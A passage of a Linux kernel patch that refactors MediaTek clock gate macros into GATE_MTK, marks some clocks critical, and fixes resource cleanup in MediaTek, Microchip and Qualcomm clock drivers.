+-	}
++#define GATE_SGMII(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &sgmii_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii_clks[2][4] = {
+ 	{
+diff --git a/drivers/clk/mediatek/clk-mt7629-hif.c b/drivers/clk/mediatek/clk-mt7629-hif.c
+index 0c8b9e1397890..3628811a2f57f 100644
+--- a/drivers/clk/mediatek/clk-mt7629-hif.c
++++ b/drivers/clk/mediatek/clk-mt7629-hif.c
+@@ -16,23 +16,11 @@
+ 
+ #include <dt-bindings/clock/mt7629-clk.h>
+ 
+-#define GATE_PCIE(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &pcie_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PCIE(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &pcie_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_SSUSB(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ssusb_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SSUSB(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ssusb_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs pcie_cg_regs = {
+ 	.set_ofs = 0x30,
+diff --git a/drivers/clk/mediatek/clk-mt7629.c b/drivers/clk/mediatek/clk-mt7629.c
+index e4a08c811adc2..0bc88b7d171b5 100644
+--- a/drivers/clk/mediatek/clk-mt7629.c
++++ b/drivers/clk/mediatek/clk-mt7629.c
+@@ -50,41 +50,17 @@
+ 		_pd_reg, _pd_shift, _tuner_reg, _pcw_reg, _pcw_shift,	\
+ 		NULL, "clk20m")
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &apmixed_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_APMIXED(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &apmixed_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static DEFINE_SPINLOCK(mt7629_clk_lock);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt7986-eth.c b/drivers/clk/mediatek/clk-mt7986-eth.c
+index 7868c0728e962..c21e1d672384a 100644
+--- a/drivers/clk/mediatek/clk-mt7986-eth.c
++++ b/drivers/clk/mediatek/clk-mt7986-eth.c
+@@ -22,12 +22,8 @@ static const struct mtk_gate_regs sgmii0_cg_regs = {
+ 	.sta_ofs = 0xe4,
+ };
+ 
+-#define GATE_SGMII0(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &sgmii0_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_SGMII0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &sgmii0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii0_clks[] __initconst = {
+ 	GATE_SGMII0(CLK_SGMII0_TX250M_EN, "sgmii0_tx250m_en", "top_xtal", 2),
+@@ -42,12 +38,8 @@ static const struct mtk_gate_regs sgmii1_cg_regs = {
+ 	.sta_ofs = 0xe4,
+ };
+ 
+-#define GATE_SGMII1(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &sgmii1_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_SGMII1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &sgmii1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii1_clks[] __initconst = {
+ 	GATE_SGMII1(CLK_SGMII1_TX250M_EN, "sgmii1_tx250m_en", "top_xtal", 2),
+@@ -62,12 +54,8 @@ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.sta_ofs = 0x30,
+ };
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift)                                  \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &eth_cg_regs, .shift = _shift,                         \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate eth_clks[] __initconst = {
+ 	GATE_ETH(CLK_ETH_FE_EN, "eth_fe_en", "netsys_2x_sel", 6),
+diff --git a/drivers/clk/mediatek/clk-mt7986-infracfg.c b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+index 49666047bf0ed..74e68a7197301 100644
+--- a/drivers/clk/mediatek/clk-mt7986-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+@@ -87,26 +87,14 @@ static const struct mtk_gate_regs infra2_cg_regs = {
+ 	.sta_ofs = 0x68,
+ };
+ 
+-#define GATE_INFRA0(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra0_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA0(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_INFRA1(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra1_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA1(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_INFRA2(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra2_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA2(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	/* INFRA0 */
+diff --git a/drivers/clk/mediatek/clk-mt8135.c b/drivers/clk/mediatek/clk-mt8135.c
+index b68888a034c40..3ea06d2ec2f11 100644
+--- a/drivers/clk/mediatek/clk-mt8135.c
++++ b/drivers/clk/mediatek/clk-mt8135.c
+@@ -2,6 +2,8 @@
+ /*
+  * Copyright (c) 2014 MediaTek Inc.
+  * Author: James Liao <jamesjj.liao@mediatek.com>
++ * Copyright (c) 2023 Collabora, Ltd.
++ *               AngeloGioacchino Del Regno <angelogioacchino.delregno@collabora.com>
+  */
+ 
+ #include <linux/clk.h>
+@@ -390,7 +392,7 @@ static const struct mtk_composite top_muxes[] __initconst = {
+ 	MUX_GATE(CLK_TOP_GCPU_SEL, "gcpu_sel", gcpu_parents, 0x0164, 24, 3, 31),
+ 	/* CLK_CFG_9 */
+ 	MUX_GATE(CLK_TOP_DPI1_SEL, "dpi1_sel", dpi1_parents, 0x0168, 0, 2, 7),
+-	MUX_GATE(CLK_TOP_CCI_SEL, "cci_sel", cci_parents, 0x0168, 8, 3, 15),
++	MUX_GATE_FLAGS(CLK_TOP_CCI_SEL, "cci_sel", cci_parents, 0x0168, 8, 3, 15, CLK_IS_CRITICAL),
+ 	MUX_GATE(CLK_TOP_APLL_SEL, "apll_sel", apll_parents, 0x0168, 16, 3, 23),
+ 	MUX_GATE(CLK_TOP_HDMIPLL_SEL, "hdmipll_sel", hdmipll_parents, 0x0168, 24, 2, 31),
+ };
+@@ -401,14 +403,12 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x0048,
+ };
+ 
+-#define GATE_ICG(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &infra_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_ICG(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_ICG_AO(_id, _name, _parent, _shift)	\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, CLK_IS_CRITICAL)
+ 
+ static const struct mtk_gate infra_clks[] __initconst = {
+ 	GATE_ICG(CLK_INFRA_PMIC_WRAP, "pmic_wrap_ck", "axi_sel", 23),
+@@ -417,7 +417,7 @@ static const struct mtk_gate infra_clks[] __initconst = {
+ 	GATE_ICG(CLK_INFRA_CCIF0_AP_CTRL, "ccif0_ap_ctrl", "axi_sel", 20),
+ 	GATE_ICG(CLK_INFRA_KP, "kp_ck", "axi_sel", 16),
+ 	GATE_ICG(CLK_INFRA_CPUM, "cpum_ck", "cpum_tck_in", 15),
+-	GATE_ICG(CLK_INFRA_M4U, "m4u_ck", "mem_sel", 8),
++	GATE_ICG_AO(CLK_INFRA_M4U, "m4u_ck", "mem_sel", 8),
+ 	GATE_ICG(CLK_INFRA_MFGAXI, "mfgaxi_ck", "axi_sel", 7),
+ 	GATE_ICG(CLK_INFRA_DEVAPC, "devapc_ck", "axi_sel", 6),
+ 	GATE_ICG(CLK_INFRA_AUDIO, "audio_ck", "aud_intbus_sel", 5),
+@@ -438,23 +438,11 @@ static const struct mtk_gate_regs peri1_cg_regs = {
+ 	.sta_ofs = 0x001c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &peri0_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &peri1_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate peri_gates[] __initconst = {
+ 	/* PERI0 */
+@@ -551,8 +539,6 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+ 			&mt8135_clk_lock, clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_CCI_SEL]->clk);
+-
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		pr_err("%s(): could not register clock provider: %d\n",
+@@ -570,8 +556,6 @@ static void __init mtk_infrasys_init(struct device_node *node)
+ 	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+ 						clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_INFRA_M4U]->clk);
+-
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		pr_err("%s(): could not register clock provider: %d\n",
+diff --git a/drivers/clk/mediatek/clk-mt8167-aud.c b/drivers/clk/mediatek/clk-mt8167-aud.c
+index ce1ae8d243c33..b5ac196cd9454 100644
+--- a/drivers/clk/mediatek/clk-mt8167-aud.c
++++ b/drivers/clk/mediatek/clk-mt8167-aud.c
+@@ -23,14 +23,9 @@ static const struct mtk_gate_regs aud_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,			\
+-		.name = _name,			\
+-		.parent_name = _parent,		\
+-		.regs = &aud_cg_regs,		\
+-		.shift = _shift,		\
+-		.ops = &mtk_clk_gate_ops_no_setclr,		\
+-	}
++#define GATE_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
++
+ 
+ static const struct mtk_gate aud_clks[] __initconst = {
+ 	GATE_AUD(CLK_AUD_AFE, "aud_afe", "clk26m_ck", 2),
+diff --git a/drivers/clk/mediatek/clk-mt8167-img.c b/drivers/clk/mediatek/clk-mt8167-img.c
+index e359e563d2b79..4e7c0772b4f99 100644
+--- a/drivers/clk/mediatek/clk-mt8167-img.c
++++ b/drivers/clk/mediatek/clk-mt8167-img.c
+@@ -23,14 +23,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] __initconst = {
+ 	GATE_IMG(CLK_IMG_LARB1_SMI, "img_larb1_smi", "smi_mm", 0),
+diff --git a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+index 4fd82fe87d6e5..192714498b2ec 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
++++ b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+@@ -23,14 +23,8 @@ static const struct mtk_gate_regs mfg_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_MFG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mfg_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MFG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mfg_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mfg_clks[] __initconst = {
+ 	GATE_MFG(CLK_MFG_BAXI, "mfg_baxi", "ahb_infra_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt8167-mm.c b/drivers/clk/mediatek/clk-mt8167-mm.c
+index 73910060577f6..a94961b7b8cc6 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mm.c
++++ b/drivers/clk/mediatek/clk-mt8167-mm.c
+@@ -29,23 +29,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt8167-vdec.c b/drivers/clk/mediatek/clk-mt8167-vdec.c
+index ee4fffb6859da..38f0ba357d599 100644
+--- a/drivers/clk/mediatek/clk-mt8167-vdec.c
++++ b/drivers/clk/mediatek/clk-mt8167-vdec.c
+@@ -29,23 +29,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x8,
+ };
+ 
+-#define GATE_VDEC0_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] __initconst = {
+ 	/* VDEC0 */
+diff --git a/drivers/clk/mediatek/clk-mt8173-mm.c b/drivers/clk/mediatek/clk-mt8173-mm.c
+index 8abf42c2030c6..5826eabdc9c77 100644
+--- a/drivers/clk/mediatek/clk-mt8173-mm.c
++++ b/drivers/clk/mediatek/clk-mt8173-mm.c
+@@ -25,23 +25,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {			\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &mm0_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {			\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &mm1_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mt8173_mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt8516-aud.c b/drivers/clk/mediatek/clk-mt8516-aud.c
+index 90f48068a8de7..a3dafc719799c 100644
+--- a/drivers/clk/mediatek/clk-mt8516-aud.c
++++ b/drivers/clk/mediatek/clk-mt8516-aud.c
+@@ -22,14 +22,8 @@ static const struct mtk_gate_regs aud_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,			\
+-		.name = _name,			\
+-		.parent_name = _parent,		\
+-		.regs = &aud_cg_regs,		\
+-		.shift = _shift,		\
+-		.ops = &mtk_clk_gate_ops_no_setclr,		\
+-	}
++#define GATE_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate aud_clks[] __initconst = {
+ 	GATE_AUD(CLK_AUD_AFE, "aud_afe", "clk26m_ck", 2),
+diff --git a/drivers/clk/mediatek/clk-mt8516.c b/drivers/clk/mediatek/clk-mt8516.c
+index b96db88893e23..056953d594c66 100644
+--- a/drivers/clk/mediatek/clk-mt8516.c
++++ b/drivers/clk/mediatek/clk-mt8516.c
+@@ -525,59 +525,23 @@ static const struct mtk_gate_regs top5_cg_regs = {
+ 	.sta_ofs = 0x44,
+ };
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP2_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_TOP2_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_TOP3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP3(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top3_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP4_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top4_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_TOP4_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top4_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_TOP5(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top5_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP5(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top5_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate top_clks[] __initconst = {
+ 	/* TOP1 */
+diff --git a/drivers/clk/mediatek/clk-pllfh.c b/drivers/clk/mediatek/clk-pllfh.c
+index f48780bec5077..f135b32c6dbed 100644
+--- a/drivers/clk/mediatek/clk-pllfh.c
++++ b/drivers/clk/mediatek/clk-pllfh.c
+@@ -75,13 +75,13 @@ void fhctl_parse_dt(const u8 *compatible_node, struct mtk_pllfh_data *pllfhs,
+ 	base = of_iomap(node, 0);
+ 	if (!base) {
+ 		pr_err("%s(): ioremap failed\n", __func__);
+-		return;
++		goto out_node_put;
+ 	}
+ 
+ 	num_clocks = of_clk_get_parent_count(node);
+ 	if (!num_clocks) {
+ 		pr_err("%s(): failed to get clocks property\n", __func__);
+-		return;
++		goto err;
+ 	}
+ 
+ 	for (i = 0; i < num_clocks; i++) {
+@@ -102,6 +102,13 @@ void fhctl_parse_dt(const u8 *compatible_node, struct mtk_pllfh_data *pllfhs,
+ 		pllfh->state.ssc_rate = ssc_rate;
+ 		pllfh->state.base = base;
+ 	}
++
++out_node_put:
++	of_node_put(node);
++	return;
++err:
++	iounmap(base);
++	goto out_node_put;
+ }
+ 
+ static void pllfh_init(struct mtk_fh *fh, struct mtk_pllfh_data *pllfh_data)
+diff --git a/drivers/clk/microchip/clk-mpfs.c b/drivers/clk/microchip/clk-mpfs.c
+index 4f0a19db7ed74..cc5d7dee59f06 100644
+--- a/drivers/clk/microchip/clk-mpfs.c
++++ b/drivers/clk/microchip/clk-mpfs.c
+@@ -374,14 +374,13 @@ static void mpfs_reset_unregister_adev(void *_adev)
+ 	struct auxiliary_device *adev = _adev;
+ 
+ 	auxiliary_device_delete(adev);
++	auxiliary_device_uninit(adev);
+ }
+ 
+ static void mpfs_reset_adev_release(struct device *dev)
+ {
+ 	struct auxiliary_device *adev = to_auxiliary_dev(dev);
+ 
+-	auxiliary_device_uninit(adev);
+-
+ 	kfree(adev);
+ }
+ 
+diff --git a/drivers/clk/qcom/dispcc-qcm2290.c b/drivers/clk/qcom/dispcc-qcm2290.c
+index 96b149365912a..24755dc841f9d 100644
+--- a/drivers/clk/qcom/dispcc-qcm2290.c
++++ b/drivers/clk/qcom/dispcc-qcm2290.c
+@@ -26,7 +26,6 @@ enum {
+ 	P_DISP_CC_PLL0_OUT_MAIN,
+ 	P_DSI0_PHY_PLL_OUT_BYTECLK,
+ 	P_DSI0_PHY_PLL_OUT_DSICLK,
+-	P_DSI1_PHY_PLL_OUT_DSICLK,
+ 	P_GPLL0_OUT_MAIN,
+ 	P_SLEEP_CLK,
+ };
+@@ -71,7 +70,6 @@ static const struct parent_map disp_cc_parent_map_0[] = {
+ static const struct clk_parent_data disp_cc_parent_data_0[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .fw_name = "dsi0_phy_pll_out_byteclk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_1[] = {
+@@ -80,7 +78,6 @@ static const struct parent_map disp_cc_parent_map_1[] = {
+ 
+ static const struct clk_parent_data disp_cc_parent_data_1[] = {
+ 	{ .fw_name = "bi_tcxo" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_2[] = {
+@@ -91,7 +88,6 @@ static const struct parent_map disp_cc_parent_map_2[] = {
+ static const struct clk_parent_data disp_cc_parent_data_2[] = {
+ 	{ .fw_name = "bi_tcxo_ao" },
+ 	{ .fw_name = "gcc_disp_gpll0_div_clk_src" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_3[] = {
+@@ -104,20 +100,16 @@ static const struct clk_parent_data disp_cc_parent_data_3[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .hw = &disp_cc_pll0.clkr.hw },
+ 	{ .fw_name = "gcc_disp_gpll0_clk_src" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_4[] = {
+ 	{ P_BI_TCXO, 0 },
+ 	{ P_DSI0_PHY_PLL_OUT_DSICLK, 1 },
+-	{ P_DSI1_PHY_PLL_OUT_DSICLK, 2 },
+ };
+ 
+ static const struct clk_parent_data disp_cc_parent_data_4[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .fw_name = "dsi0_phy_pll_out_dsiclk" },
+-	{ .fw_name = "dsi1_phy_pll_out_dsiclk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_5[] = {
+@@ -126,7 +118,6 @@ static const struct parent_map disp_cc_parent_map_5[] = {
+ 
+ static const struct clk_parent_data disp_cc_parent_data_5[] = {
